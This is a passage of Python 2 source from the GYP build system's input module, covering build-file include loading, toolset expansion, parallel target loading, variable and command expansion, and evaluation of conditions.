  # Recurse into subdictionaries.  items() instead of the Python 2-only
  # iteritems(): behavior is identical and it keeps the code portable.
  for k, v in subdict.items():
    if v.__class__ == dict:
      LoadBuildFileIncludesIntoDict(v, subdict_path, data, aux_data, variables,
                                    None, check)
    elif v.__class__ == list:
      LoadBuildFileIncludesIntoList(v, subdict_path, data, aux_data, variables,
                                    check)
# This recurses into lists so that it can look for dicts.
def LoadBuildFileIncludesIntoList(sublist, sublist_path, data, aux_data,
                                  variables, check):
  """Walk |sublist|, processing 'includes' in any dict found inside it."""
  for entry in sublist:
    if entry.__class__ == dict:
      LoadBuildFileIncludesIntoDict(entry, sublist_path, data, aux_data,
                                    variables, None, check)
    elif entry.__class__ == list:
      LoadBuildFileIncludesIntoList(entry, sublist_path, data, aux_data,
                                    variables, check)
# Processes toolsets in all the targets. This recurses into condition entries
# since they can contain toolsets as well.
def ProcessToolsetsInDict(data):
  """Expand each target's 'toolsets' list into one target per toolset.

  Targets that already carry an explicit 'toolset' (and no 'toolsets')
  pass through untouched.  Recurses into 'conditions' entries, which can
  also contain targets.
  """
  if 'targets' in data:
    expanded_targets = []
    for target in data['targets']:
      # Already expanded: an explicit 'toolset' with no pending 'toolsets'.
      if 'toolset' in target and 'toolsets' not in target:
        expanded_targets.append(target)
        continue
      if multiple_toolsets:
        toolsets = target.get('toolsets', ['target'])
      else:
        toolsets = ['target']
      # Consume the 'toolsets' definition so it is only processed once.
      target.pop('toolsets', None)
      if toolsets:
        # Only deep-copy for toolsets beyond the first; the original dict
        # is reused for toolsets[0].
        for extra_toolset in toolsets[1:]:
          duplicate = copy.deepcopy(target)
          duplicate['toolset'] = extra_toolset
          expanded_targets.append(duplicate)
        target['toolset'] = toolsets[0]
        expanded_targets.append(target)
    data['targets'] = expanded_targets
  if 'conditions' in data:
    for condition in data['conditions']:
      if isinstance(condition, list):
        for condition_dict in condition[1:]:
          ProcessToolsetsInDict(condition_dict)
# TODO(mark): I don't love this name.  It just means that it's going to load
# a build file that contains targets and is expected to provide a targets dict
# that contains the targets...
def LoadTargetBuildFile(build_file_path, data, aux_data, variables, includes,
                        depth, check, load_dependencies):
  """Load the target build file at build_file_path and record it in |data|.

  Sets the DEPTH variable, loads the file (merging its includes), runs
  toolset expansion and "early" variable/condition processing, merges
  target_defaults into every target, and collects the dependencies named by
  the file's targets.

  Returns False if the file was already loaded.  Otherwise: when
  load_dependencies is true, recursively loads each dependency's build file
  (and returns None); when false, returns a (build_file_path, dependencies)
  tuple so the caller can schedule the dependencies itself.
  """
  # If depth is set, predefine the DEPTH variable to be a relative path from
  # this build file's directory to the directory identified by depth.
  if depth:
    # TODO(dglazkov) The backslash/forward-slash replacement at the end is a
    # temporary measure. This should really be addressed by keeping all paths
    # in POSIX until actual project generation.
    d = gyp.common.RelativePath(depth, os.path.dirname(build_file_path))
    if d == '':
      variables['DEPTH'] = '.'
    else:
      variables['DEPTH'] = d.replace('\\', '/')

  if build_file_path in data['target_build_files']:
    # Already loaded.
    return False
  data['target_build_files'].add(build_file_path)

  gyp.DebugOutput(gyp.DEBUG_INCLUDES,
                  "Loading Target Build File '%s'", build_file_path)

  build_file_data = LoadOneBuildFile(build_file_path, data, aux_data,
                                     variables, includes, True, check)

  # Store DEPTH for later use in generators.
  build_file_data['_DEPTH'] = depth

  # Set up the included_files key indicating which .gyp files contributed to
  # this target dict.
  if 'included_files' in build_file_data:
    raise GypError(build_file_path + ' must not contain included_files key')

  included = GetIncludedBuildFiles(build_file_path, aux_data)
  build_file_data['included_files'] = []
  for included_file in included:
    # included_file is relative to the current directory, but it needs to
    # be made relative to build_file_path's directory.
    included_relative = \
        gyp.common.RelativePath(included_file,
                                os.path.dirname(build_file_path))
    build_file_data['included_files'].append(included_relative)

  # Do a first round of toolsets expansion so that conditions can be defined
  # per toolset.
  ProcessToolsetsInDict(build_file_data)

  # Apply "pre"/"early" variable expansions and condition evaluations.
  ProcessVariablesAndConditionsInDict(
      build_file_data, PHASE_EARLY, variables, build_file_path)

  # Since some toolsets might have been defined conditionally, perform
  # a second round of toolsets expansion now.
  ProcessToolsetsInDict(build_file_data)

  # Look at each project's target_defaults dict, and merge settings into
  # targets.
  if 'target_defaults' in build_file_data:
    if 'targets' not in build_file_data:
      raise GypError("Unable to find targets in build file %s" %
                     build_file_path)

    index = 0
    while index < len(build_file_data['targets']):
      # This procedure needs to give the impression that target_defaults is
      # used as defaults, and the individual targets inherit from that.
      # The individual targets need to be merged into the defaults.  Make
      # a deep copy of the defaults for each target, merge the target dict
      # as found in the input file into that copy, and then hook up the
      # copy with the target-specific data merged into it as the replacement
      # target dict.
      old_target_dict = build_file_data['targets'][index]
      new_target_dict = copy.deepcopy(build_file_data['target_defaults'])
      MergeDicts(new_target_dict, old_target_dict,
                 build_file_path, build_file_path)
      build_file_data['targets'][index] = new_target_dict
      index += 1

    # No longer needed.
    del build_file_data['target_defaults']

  # Look for dependencies.  This means that dependency resolution occurs
  # after "pre" conditionals and variable expansion, but before "post" -
  # in other words, you can't put a "dependencies" section inside a "post"
  # conditional within a target.

  dependencies = []
  if 'targets' in build_file_data:
    for target_dict in build_file_data['targets']:
      if 'dependencies' not in target_dict:
        continue
      for dependency in target_dict['dependencies']:
        dependencies.append(
            gyp.common.ResolveTarget(build_file_path, dependency, None)[0])

  if load_dependencies:
    for dependency in dependencies:
      try:
        LoadTargetBuildFile(dependency, data, aux_data, variables,
                            includes, depth, check, load_dependencies)
      except Exception, e:
        gyp.common.ExceptionAppend(
            e, 'while loading dependencies of %s' % build_file_path)
        raise
  else:
    return (build_file_path, dependencies)
def CallLoadTargetBuildFile(global_flags,
                            build_file_path, data,
                            aux_data, variables,
                            includes, depth, check,
                            generator_input_info):
  """Wrapper around LoadTargetBuildFile for parallel processing.

  This wrapper is used when LoadTargetBuildFile is executed in
  a worker process.  Returns None on failure; otherwise a
  (build_file_path, data_out, aux_data_out, dependencies) tuple containing
  only the entries this load added, for the parent to merge back in
  ParallelState.LoadTargetBuildFileCallback.
  """

  try:
    # Let the parent process handle Ctrl-C; workers ignore it so the pool
    # can be terminated cleanly.
    signal.signal(signal.SIGINT, signal.SIG_IGN)

    # Apply globals so that the worker process behaves the same.
    for key, value in global_flags.iteritems():
      globals()[key] = value

    # Save the keys so we can return data that changed.
    data_keys = set(data)
    aux_data_keys = set(aux_data)

    SetGeneratorGlobals(generator_input_info)
    result = LoadTargetBuildFile(build_file_path, data,
                                 aux_data, variables,
                                 includes, depth, check, False)
    # False means the file was already loaded; pass that through unchanged.
    if not result:
      return result

    (build_file_path, dependencies) = result

    # Collect only the entries added by this load (keys absent from the
    # pre-call snapshots); 'target_build_files' is shared and skipped.
    data_out = {}
    for key in data:
      if key == 'target_build_files':
        continue
      if key not in data_keys:
        data_out[key] = data[key]
    aux_data_out = {}
    for key in aux_data:
      if key not in aux_data_keys:
        aux_data_out[key] = aux_data[key]

    # This gets serialized and sent back to the main process via a pipe.
    # It's handled in LoadTargetBuildFileCallback.
    return (build_file_path,
            data_out,
            aux_data_out,
            dependencies)
  except GypError, e:
    sys.stderr.write("gyp: %s\n" % e)
    return None
  except Exception, e:
    print >>sys.stderr, 'Exception:', e
    print >>sys.stderr, traceback.format_exc()
    return None
class ParallelProcessingError(Exception):
  """Raised when an error occurs while loading build files in parallel."""
class ParallelState(object):
  """Class to keep track of state when processing input files in parallel.

  If build files are loaded in parallel, use this to keep track of
  state during farming out and processing parallel jobs. It's stored
  in a global so that the callback function can have access to it.
  """

  def __init__(self):
    # multiprocessing.Pool instance, created lazily by the scheduler.
    self.pool = None
    # Condition variable guarding this object; also wakes the main loop
    # when a callback delivers results or reports an error.
    self.condition = None
    # The "data" dict that was passed to LoadTargetBuildFileParallel
    self.data = None
    # The "aux_data" dict that was passed to LoadTargetBuildFileParallel
    self.aux_data = None
    # Number of outstanding parallel calls; decremented as responses arrive.
    self.pending = 0
    # Every build file ever scheduled, so the same one isn't farmed twice.
    self.scheduled = set()
    # Dependency build file paths discovered but not yet scheduled.
    self.dependencies = []
    # Set when a child process reports a failure.
    self.error = False

  def LoadTargetBuildFileCallback(self, result):
    """Handle the results of running LoadTargetBuildFile in another process.
    """
    self.condition.acquire()
    try:
      if not result:
        # Child failed; flag it and let the main loop bail out.
        self.error = True
        return
      build_file_path0, data0, aux_data0, dependencies0 = result
      self.data['target_build_files'].add(build_file_path0)
      self.data.update(data0)
      self.aux_data.update(aux_data0)
      for new_dependency in dependencies0:
        if new_dependency not in self.scheduled:
          self.scheduled.add(new_dependency)
          self.dependencies.append(new_dependency)
      self.pending -= 1
    finally:
      self.condition.notify()
      self.condition.release()
def LoadTargetBuildFilesParallel(build_files, data, aux_data,
                                 variables, includes, depth, check,
                                 generator_input_info):
  """Load |build_files| and their dependencies using a process pool.

  Scheduling state lives in a ParallelState; workers run
  CallLoadTargetBuildFile and their results are merged back on the main
  process by ParallelState.LoadTargetBuildFileCallback.  Exits the program
  with status 1 if any worker reported an error.
  """
  parallel_state = ParallelState()
  parallel_state.condition = threading.Condition()
  # Make copies of the build_files argument that we can modify while working.
  parallel_state.dependencies = list(build_files)
  parallel_state.scheduled = set(build_files)
  parallel_state.pending = 0
  parallel_state.data = data
  parallel_state.aux_data = aux_data

  try:
    parallel_state.condition.acquire()
    # Keep dispatching until every discovered file is processed and no
    # async calls remain outstanding.
    while parallel_state.dependencies or parallel_state.pending:
      if parallel_state.error:
        break
      if not parallel_state.dependencies:
        # Nothing to hand out yet; wait for a callback to deliver more.
        parallel_state.condition.wait()
        continue

      dependency = parallel_state.dependencies.pop()

      parallel_state.pending += 1
      # Workers only need the shared set of already-loaded files; their
      # other additions come back through the callback.
      data_in = {}
      data_in['target_build_files'] = data['target_build_files']
      aux_data_in = {}
      # Module-level globals the worker must replicate (applied in
      # CallLoadTargetBuildFile).
      global_flags = {
        'path_sections': globals()['path_sections'],
        'non_configuration_keys': globals()['non_configuration_keys'],
        'multiple_toolsets': globals()['multiple_toolsets']}

      if not parallel_state.pool:
        parallel_state.pool = multiprocessing.Pool(8)
      parallel_state.pool.apply_async(
          CallLoadTargetBuildFile,
          args = (global_flags, dependency,
                  data_in, aux_data_in,
                  variables, includes, depth, check, generator_input_info),
          callback = parallel_state.LoadTargetBuildFileCallback)
  except KeyboardInterrupt, e:
    parallel_state.pool.terminate()
    raise e

  parallel_state.condition.release()

  parallel_state.pool.close()
  parallel_state.pool.join()
  parallel_state.pool = None

  if parallel_state.error:
    sys.exit(1)
# Look for the bracket that matches the first bracket seen in a
# string, and return the start and end as a tuple.  For example, if
# the input is something like "<(foo <(bar)) blah", then it would
# return (1, 13), indicating the entire string except for the leading
# "<" and trailing " blah".
LBRACKETS = set('{[(')
BRACKETS = {'}': '{', ']': '[', ')': '('}


def FindEnclosingBracketGroup(input_str):
  """Return (start, end) of the first balanced bracket group in input_str.

  end is one past the matching close bracket.  Returns (-1, -1) when the
  string has no bracket group or the brackets are mismatched/unbalanced.
  """
  open_stack = []
  group_start = -1
  for pos, ch in enumerate(input_str):
    if ch in LBRACKETS:
      if group_start == -1:
        group_start = pos
      open_stack.append(ch)
    elif ch in BRACKETS:
      # A close bracket with nothing open, or the wrong kind open, is an
      # error; an emptied stack means the first group just closed.
      if not open_stack or open_stack.pop() != BRACKETS[ch]:
        return (-1, -1)
      if not open_stack:
        return (group_start, pos + 1)
  return (-1, -1)
# Matches a string that is exactly a canonically-formatted integer:
# '0', or an optional '-' followed by digits with no leading zero.
canonical_int_re = re.compile('(0|-?[1-9][0-9]*)$')


def IsStrCanonicalInt(string):
  """Returns True if |string| is in its canonical integer form.

  The canonical form is such that str(int(string)) == string.
  """
  # bool() so the function honors its documented contract rather than
  # returning a MatchObject or False depending on the input; truthiness
  # for existing callers is unchanged.
  return isinstance(string, str) and bool(canonical_int_re.match(string))
# This matches things like "<(asdf)", "<!(cmd)", "<!@(cmd)", "<|(list)",
# "<!interpreter(arguments)", "<([list])", and even "<([)" and "<(<())".
# In the last case, the inner "<()" is captured in match['content'].
#
# Named groups (consumed by ExpandVariables):
#   replace        - the full text to substitute
#   type           - the expansion prefix ('<' plus optional '!', '@', '|')
#   command_string - optional command name such as 'pymod_do_main'
#   is_array       - non-empty ('[') when the contents form a list literal
#   content        - the variable name or command inside the parens
early_variable_re = re.compile(
    '(?P<replace>(?P<type><(?:(?:!?@?)|\|)?)'
    '(?P<command_string>[-a-zA-Z0-9_.]+)?'
    '\((?P<is_array>\s*\[?)'
    '(?P<content>.*?)(\]?)\))')

# This matches the same as early_variable_re, but with '>' instead of '<'.
late_variable_re = re.compile(
    '(?P<replace>(?P<type>>(?:(?:!?@?)|\|)?)'
    '(?P<command_string>[-a-zA-Z0-9_.]+)?'
    '\((?P<is_array>\s*\[?)'
    '(?P<content>.*?)(\]?)\))')

# This matches the same as early_variable_re, but with '^' instead of '<'.
latelate_variable_re = re.compile(
    '(?P<replace>(?P<type>[\^](?:(?:!?@?)|\|)?)'
    '(?P<command_string>[-a-zA-Z0-9_.]+)?'
    '\((?P<is_array>\s*\[?)'
    '(?P<content>.*?)(\]?)\))')

# Global cache of results from running commands so they don't have to be run
# more than once.  Keyed by the command contents; see ExpandVariables.
cached_command_results = {}
def FixupPlatformCommand(cmd):
  """Rewrite a command for Windows ('cat ' -> 'type '); no-op elsewhere.

  cmd may be a string or a list; for a list only the first element is
  rewritten.
  """
  if sys.platform != 'win32':
    return cmd
  if type(cmd) == list:
    return [re.sub('^cat ', 'type ', cmd[0])] + cmd[1:]
  return re.sub('^cat ', 'type ', cmd)
# Expansion/condition-evaluation phases; they select which regex and
# expansion symbol ExpandVariables uses ('<' early, '>' late, '^' latelate)
# and which conditions key ProcessConditionsInDict consumes.
PHASE_EARLY = 0
PHASE_LATE = 1
PHASE_LATELATE = 2
def ExpandVariables(input, phase, variables, build_file):
  """Expand GYP variable and command references in |input| for |phase|.

  |input| may be any value; only strings containing the phase's expansion
  symbol ('<' early, '>' late, '^' latelate) are expanded.  Plain
  references resolve against |variables|; '!' forms run commands (cached in
  cached_command_results); '|' forms write file lists; '@' forms expand to
  a list.  Paths are interpreted relative to |build_file|'s directory.
  Returns a string, int, or list depending on the expansion.
  """
  # Look for the pattern that gets expanded into variables
  if phase == PHASE_EARLY:
    variable_re = early_variable_re
    expansion_symbol = '<'
  elif phase == PHASE_LATE:
    variable_re = late_variable_re
    expansion_symbol = '>'
  elif phase == PHASE_LATELATE:
    variable_re = latelate_variable_re
    expansion_symbol = '^'
  else:
    assert False

  input_str = str(input)
  if IsStrCanonicalInt(input_str):
    return int(input_str)

  # Do a quick scan to determine if an expensive regex search is warranted.
  if expansion_symbol not in input_str:
    return input_str

  # Get the entire list of matches as a list of MatchObject instances.
  # (using findall here would return strings instead of MatchObjects).
  matches = list(variable_re.finditer(input_str))
  if not matches:
    return input_str

  output = input_str
  # Reverse the list of matches so that replacements are done right-to-left.
  # That ensures that earlier replacements won't mess up the string in a
  # way that causes later calls to find the earlier substituted text instead
  # of what's intended for replacement.
  matches.reverse()
  for match_group in matches:
    match = match_group.groupdict()
    gyp.DebugOutput(gyp.DEBUG_VARIABLES, "Matches: %r", match)
    # match['replace'] is the substring to look for, match['type']
    # is the character code for the replacement type (< > <! >! <| >| <@
    # >@ <!@ >!@), match['is_array'] contains a '[' for command
    # arrays, and match['content'] is the name of the variable (< >)
    # or command to run (<! >!). match['command_string'] is an optional
    # command string. Currently, only 'pymod_do_main' is supported.

    # run_command is true if a ! variant is used.
    run_command = '!' in match['type']
    command_string = match['command_string']

    # file_list is true if a | variant is used.
    file_list = '|' in match['type']

    # Capture these now so we can adjust them later.
    replace_start = match_group.start('replace')
    replace_end = match_group.end('replace')

    # Find the ending paren, and re-evaluate the contained string.
    (c_start, c_end) = FindEnclosingBracketGroup(input_str[replace_start:])

    # Adjust the replacement range to match the entire command
    # found by FindEnclosingBracketGroup (since the variable_re
    # probably doesn't match the entire command if it contained
    # nested variables).
    replace_end = replace_start + c_end

    # Find the "real" replacement, matching the appropriate closing
    # paren, and adjust the replacement start and end.
    replacement = input_str[replace_start:replace_end]

    # Figure out what the contents of the variable parens are.
    contents_start = replace_start + c_start + 1
    contents_end = replace_end - 1
    contents = input_str[contents_start:contents_end]

    # Do filter substitution now for <|().
    # Admittedly, this is different than the evaluation order in other
    # contexts. However, since filtration has no chance to run on <|(),
    # this seems like the only obvious way to give them access to filters.
    if file_list:
      processed_variables = copy.deepcopy(variables)
      ProcessListFiltersInDict(contents, processed_variables)
      # Recurse to expand variables in the contents
      contents = ExpandVariables(contents, phase,
                                 processed_variables, build_file)
    else:
      # Recurse to expand variables in the contents
      contents = ExpandVariables(contents, phase, variables, build_file)

    # Strip off leading/trailing whitespace so that variable matches are
    # simpler below (and because they are rarely needed).
    contents = contents.strip()

    # expand_to_list is true if an @ variant is used.  In that case,
    # the expansion should result in a list.  Note that the caller
    # is to be expecting a list in return, and not all callers do
    # because not all are working in list context.  Also, for list
    # expansions, there can be no other text besides the variable
    # expansion in the input string.
    expand_to_list = '@' in match['type'] and input_str == replacement

    if run_command or file_list:
      # Find the build file's directory, so commands can be run or file lists
      # generated relative to it.
      build_file_dir = os.path.dirname(build_file)
      if build_file_dir == '' and not file_list:
        # If build_file is just a leaf filename indicating a file in the
        # current directory, build_file_dir might be an empty string.  Set
        # it to None to signal to subprocess.Popen that it should run the
        # command in the current directory.
        build_file_dir = None

    # Support <|(listfile.txt ...) which generates a file
    # containing items from a gyp list, generated at gyp time.
    # This works around actions/rules which have more inputs than will
    # fit on the command line.
    if file_list:
      if type(contents) == list:
        contents_list = contents
      else:
        contents_list = contents.split(' ')
      replacement = contents_list[0]
      if os.path.isabs(replacement):
        raise GypError('| cannot handle absolute paths, got "%s"' %
                       replacement)

      if not generator_filelist_paths:
        path = os.path.join(build_file_dir, replacement)
      else:
        if os.path.isabs(build_file_dir):
          toplevel = generator_filelist_paths['toplevel']
          rel_build_file_dir = gyp.common.RelativePath(build_file_dir,
                                                       toplevel)
        else:
          rel_build_file_dir = build_file_dir
        qualified_out_dir = generator_filelist_paths['qualified_out_dir']
        path = os.path.join(qualified_out_dir, rel_build_file_dir,
                            replacement)
        gyp.common.EnsureDirExists(path)

      replacement = gyp.common.RelativePath(path, build_file_dir)
      f = gyp.common.WriteOnDiff(path)
      for i in contents_list[1:]:
        f.write('%s\n' % i)
      f.close()

    elif run_command:
      use_shell = True
      if match['is_array']:
        # The contents are a Python list literal; parse it with eval and
        # run the resulting argv without a shell.  NOTE: eval on
        # build-file-controlled text; gyp input is trusted.
        contents = eval(contents)
        use_shell = False

      # Check for a cached value to avoid executing commands, or generating
      # file lists more than once.
      # TODO(http://code.google.com/p/gyp/issues/detail?id=112): It is
      # possible that the command being invoked depends on the current
      # directory. For that case the syntax needs to be extended so that the
      # directory is also used in cache_key (it becomes a tuple).
      # TODO(http://code.google.com/p/gyp/issues/detail?id=111): In theory,
      # someone could author a set of GYP files where each time the command
      # is invoked it produces different output by design. When the need
      # arises, the syntax should be extended to support no caching off a
      # command's output so it is run every time.
      cache_key = str(contents)
      cached_value = cached_command_results.get(cache_key, None)
      if cached_value is None:
        gyp.DebugOutput(gyp.DEBUG_VARIABLES,
                        "Executing command '%s' in directory '%s'",
                        contents, build_file_dir)

        replacement = ''

        if command_string == 'pymod_do_main':
          # <!pymod_do_main(modulename param eters) loads |modulename| as a
          # python module and then calls that module's DoMain() function,
          # passing ["param", "eters"] as a single list argument. For modules
          # that don't load quickly, this can be faster than
          # <!(python modulename param eters). Do this in |build_file_dir|.
          oldwd = os.getcwd()  # Python doesn't like os.open('.'): no fchdir.
          if build_file_dir:  # build_file_dir may be None (see above).
            os.chdir(build_file_dir)
          try:

            parsed_contents = shlex.split(contents)
            try:
              py_module = __import__(parsed_contents[0])
            except ImportError as e:
              raise GypError("Error importing pymod_do_main"
                             "module (%s): %s" % (parsed_contents[0], e))
            replacement = str(py_module.DoMain(parsed_contents[1:])).rstrip()
          finally:
            os.chdir(oldwd)

          assert replacement != None
        elif command_string:
          raise GypError("Unknown command string '%s' in '%s'." %
                         (command_string, contents))
        else:
          # Fix up command with platform specific workarounds.
          contents = FixupPlatformCommand(contents)
          p = subprocess.Popen(contents, shell=use_shell,
                               stdout=subprocess.PIPE,
                               stderr=subprocess.PIPE,
                               stdin=subprocess.PIPE,
                               cwd=build_file_dir)

          p_stdout, p_stderr = p.communicate('')

          if p.wait() != 0 or p_stderr:
            sys.stderr.write(p_stderr)
            # Simulate check_call behavior, since check_call only exists
            # in python 2.5 and later.
            raise GypError("Call to '%s' returned exit status %d." %
                           (contents, p.returncode))
          replacement = p_stdout.rstrip()

        cached_command_results[cache_key] = replacement
      else:
        gyp.DebugOutput(gyp.DEBUG_VARIABLES,
                        "Had cache value for command '%s' in directory '%s'",
                        contents,build_file_dir)
        replacement = cached_value

    else:
      # Ordinary variable reference.
      if not contents in variables:
        if contents[-1] in ['!', '/']:
          # In order to allow cross-compiles (nacl) to happen more naturally,
          # we will allow references to >(sources/) etc. to resolve to
          # and empty list if undefined. This allows actions to:
          # 'action!': [
          #   '>@(_sources!)',
          # ],
          # 'action/': [
          #   '>@(_sources/)',
          # ],
          replacement = []
        else:
          raise GypError('Undefined variable ' + contents +
                         ' in ' + build_file)
      else:
        replacement = variables[contents]

    if isinstance(replacement, list):
      for item in replacement:
        if (not contents[-1] == '/' and
            not isinstance(item, str) and not isinstance(item, int)):
          raise GypError('Variable ' + contents +
                         ' must expand to a string or list of strings; ' +
                         'list contains a ' +
                         item.__class__.__name__)
      # Run through the list and handle variable expansions in it.  Since
      # the list is guaranteed not to contain dicts, this won't do anything
      # with conditions sections.
      ProcessVariablesAndConditionsInList(replacement, phase, variables,
                                          build_file)
    elif not isinstance(replacement, str) and \
         not isinstance(replacement, int):
      raise GypError('Variable ' + contents +
                     ' must expand to a string or list of strings; ' +
                     'found a ' + replacement.__class__.__name__)

    if expand_to_list:
      # Expanding in list context.  It's guaranteed that there's only one
      # replacement to do in |input_str| and that it's this replacement.  See
      # above.
      if isinstance(replacement, list):
        # If it's already a list, make a copy.
        output = replacement[:]
      else:
        # Split it the same way sh would split arguments.
        output = shlex.split(str(replacement))
    else:
      # Expanding in string context.
      encoded_replacement = ''
      if isinstance(replacement, list):
        # When expanding a list into string context, turn the list items
        # into a string in a way that will work with a subprocess call.
        #
        # TODO(mark): This isn't completely correct.  This should
        # call a generator-provided function that observes the
        # proper list-to-argument quoting rules on a specific
        # platform instead of just calling the POSIX encoding
        # routine.
        encoded_replacement = gyp.common.EncodePOSIXShellList(replacement)
      else:
        encoded_replacement = replacement

      output = output[:replace_start] + str(encoded_replacement) + \
               output[replace_end:]
    # Prepare for the next match iteration.
    input_str = output

  # Look for more matches now that we've replaced some, to deal with
  # expanding local variables (variables defined in the same
  # variables block as this one).
  gyp.DebugOutput(gyp.DEBUG_VARIABLES, "Found output %r, recursing.", output)
  if isinstance(output, list):
    if output and isinstance(output[0], list):
      # Leave output alone if it's a list of lists.
      # We don't want such lists to be stringified.
      pass
    else:
      new_output = []
      for item in output:
        new_output.append(
            ExpandVariables(item, phase, variables, build_file))
      output = new_output
  else:
    output = ExpandVariables(output, phase, variables, build_file)

  # Convert all strings that are canonically-represented integers into
  # integers.
  if isinstance(output, list):
    for index in xrange(0, len(output)):
      if IsStrCanonicalInt(output[index]):
        output[index] = int(output[index])
  elif IsStrCanonicalInt(output):
    output = int(output)

  return output
def ProcessConditionsInDict(the_dict, phase, variables, build_file):
  """Evaluate and merge a conditions section of the_dict, in place.

  Processes 'conditions' (PHASE_EARLY) or 'target_conditions' (PHASE_LATE);
  PHASE_LATELATE has no conditions section and is a no-op.

  Each item in a conditions list consists of cond_expr, a string expression
  evaluated as the condition, and true_dict, a dict that will be merged into
  the_dict if cond_expr evaluates to true.  Optionally, a third item,
  false_dict, may be present.  false_dict is merged into the_dict if
  cond_expr evaluates to false.

  Any dict merged into the_dict will be recursively processed for nested
  conditionals and other expansions, also according to phase, immediately
  prior to being merged.
  """
  if phase == PHASE_EARLY:
    conditions_key = 'conditions'
  elif phase == PHASE_LATE:
    conditions_key = 'target_conditions'
  elif phase == PHASE_LATELATE:
    return
  else:
    assert False

  if not conditions_key in the_dict:
    return

  conditions_list = the_dict[conditions_key]
  # Unhook the conditions list, it's no longer needed.
  del the_dict[conditions_key]

  for condition in conditions_list:
    if not isinstance(condition, list):
      raise GypError(conditions_key + ' must be a list')
    if len(condition) != 2 and len(condition) != 3:
      # It's possible that condition[0] won't work in which case this
      # attempt will raise its own IndexError.  That's probably fine.
      raise GypError(conditions_key + ' ' + condition[0] +
                     ' must be length 2 or 3, not ' + str(len(condition)))

    [cond_expr, true_dict] = condition[0:2]
    false_dict = None
    if len(condition) == 3:
      false_dict = condition[2]

    # Do expansions on the condition itself.  Since the condition can
    # naturally contain variable references without needing to resort to GYP
    # expansion syntax, this is of dubious value for variables, but someone
    # might want to use a command expansion directly inside a condition.
    cond_expr_expanded = ExpandVariables(cond_expr, phase, variables,
                                         build_file)
    if not isinstance(cond_expr_expanded, str) and \
       not isinstance(cond_expr_expanded, int):
      # Bug fix: this message previously referenced an undefined name
      # ('expanded'), turning the intended ValueError into a NameError.
      raise ValueError(
          'Variable expansion in this context permits str and int ' +
          'only, found ' + cond_expr_expanded.__class__.__name__)

    try:
      ast_code = compile(cond_expr_expanded, '<string>', 'eval')

      # NOTE: conditions are evaluated with eval against |variables|; gyp
      # input is trusted.  The empty __builtins__ limits accidents only.
      if eval(ast_code, {'__builtins__': None}, variables):
        merge_dict = true_dict
      else:
        merge_dict = false_dict
    except SyntaxError as e:
      syntax_error = SyntaxError('%s while evaluating condition \'%s\' in %s '
                                 'at character %d.' %
                                 (str(e.args[0]), e.text, build_file,
                                  e.offset),
                                 e.filename, e.lineno, e.offset, e.text)
      raise syntax_error
    except NameError as e:
      gyp.common.ExceptionAppend(e, 'while evaluating condition \'%s\' in %s' %
                                 (cond_expr_expanded, build_file))
      raise GypError(e)

    if merge_dict is not None:
      # Expand variables and nested conditionals in the merge_dict before
      # merging it.
      ProcessVariablesAndConditionsInDict(merge_dict, phase,
                                          variables, build_file)

      MergeDicts(the_dict, merge_dict, build_file, build_file)
def LoadAutomaticVariablesFromDict(variables, the_dict):
  """Add "automatic" variables from the_dict to |variables|.

  Any key in the_dict whose value is a plain string, int, or list becomes
  an automatic variable whose name is the key with a '_' prepended (e.g.
  key 'sources' becomes variable '_sources').
  """
  # items() instead of the Python 2-only iteritems(): identical behavior,
  # portable to Python 3.
  for key, value in the_dict.items():
    if isinstance(value, str) or isinstance(value, int) or \
       isinstance(value, list):
      variables['_' + key] = value
def LoadVariablesFromVariablesDict(variables, the_dict, the_dict_key):
  """Load |variables| from the_dict's 'variables' sub-dict, if present.

  The variable name is the key name in the "variables" dict.  Variables
  that end with the % character are defaults: they are set only if they are
  unset in |variables|.  the_dict_key is the name of the key used to access
  the_dict in the_dict's parent dict.  If the_dict's parent is not a dict
  (it could be a list or it could be parentless because it is a root dict),
  the_dict_key will be None.
  """
  # items() instead of the Python 2-only iteritems(): identical behavior.
  for key, value in the_dict.get('variables', {}).items():
    # Only plain values become variables; anything else is skipped.
    if not isinstance(value, str) and not isinstance(value, int) and \
       not isinstance(value, list):
      continue

    if key.endswith('%'):
      variable_name = key[:-1]
      if variable_name in variables:
        # If the variable is already set, don't set it.
        continue
      # Bug fix: this used "is 'variables'", an identity comparison against
      # a string literal that only worked via CPython interning; use '=='.
      if the_dict_key == 'variables' and variable_name in the_dict:
        # If the variable is set without a % in the_dict, and the_dict is a
        # variables dict (making |variables| a variables sub-dict of a
        # variables dict), use the_dict's definition.
        value = the_dict[variable_name]
    else:
      variable_name = key

    variables[variable_name] = value
def ProcessVariablesAndConditionsInDict(the_dict, phase, variables_in,
                                        build_file, the_dict_key=None):
  """Handle all variable and command expansion and conditional evaluation.

  This function is the public entry point for all variable expansions and
  conditional evaluations.  The variables_in dictionary will not be modified
  by this function; the_dict is modified in place.

  Args:
    the_dict: The dict to process.  Modified in place.
    phase: The processing phase identifier, passed through to
        ExpandVariables and ProcessConditionsInDict.
    variables_in: Dict of variables visible in this scope.  Copied before
        use; never modified.
    build_file: Path of the build file the_dict came from, used for error
        reporting and relative-path fixups by callees.
    the_dict_key: Name of the key that accesses the_dict in its parent
        dict, or None if the_dict has no dict parent (see
        LoadVariablesFromVariablesDict).
  """
  # Make a copy of the variables_in dict that can be modified during the
  # loading of automatics and the loading of the variables dict.
  variables = variables_in.copy()
  LoadAutomaticVariablesFromDict(variables, the_dict)
  if 'variables' in the_dict:
    # Make sure all the local variables are added to the variables
    # list before we process them so that you can reference one
    # variable from another.  They will be fully expanded by recursion
    # in ExpandVariables.
    for key, value in the_dict['variables'].iteritems():
      variables[key] = value
    # Handle the associated variables dict first, so that any variable
    # references within can be resolved prior to using them as variables.
    # Pass a copy of the variables dict to avoid having it be tainted.
    # Otherwise, it would have extra automatics added for everything that
    # should just be an ordinary variable in this scope.
    ProcessVariablesAndConditionsInDict(the_dict['variables'], phase,
                                        variables, build_file, 'variables')
  LoadVariablesFromVariablesDict(variables, the_dict, the_dict_key)
  # First expansion pass: expand every string value in the_dict in place.
  for key, value in the_dict.iteritems():
    # Skip "variables", which was already processed if present.
    if key != 'variables' and isinstance(value, str):
      expanded = ExpandVariables(value, phase, variables, build_file)
      if not isinstance(expanded, str) and not isinstance(expanded, int):
        raise ValueError, \
              'Variable expansion in this context permits str and int ' + \
              'only, found ' + expanded.__class__.__name__ + ' for ' + key
      the_dict[key] = expanded
  # Variable expansion may have resulted in changes to automatics.  Reload.
  # TODO(mark): Optimization: only reload if no changes were made.
  variables = variables_in.copy()
  LoadAutomaticVariablesFromDict(variables, the_dict)
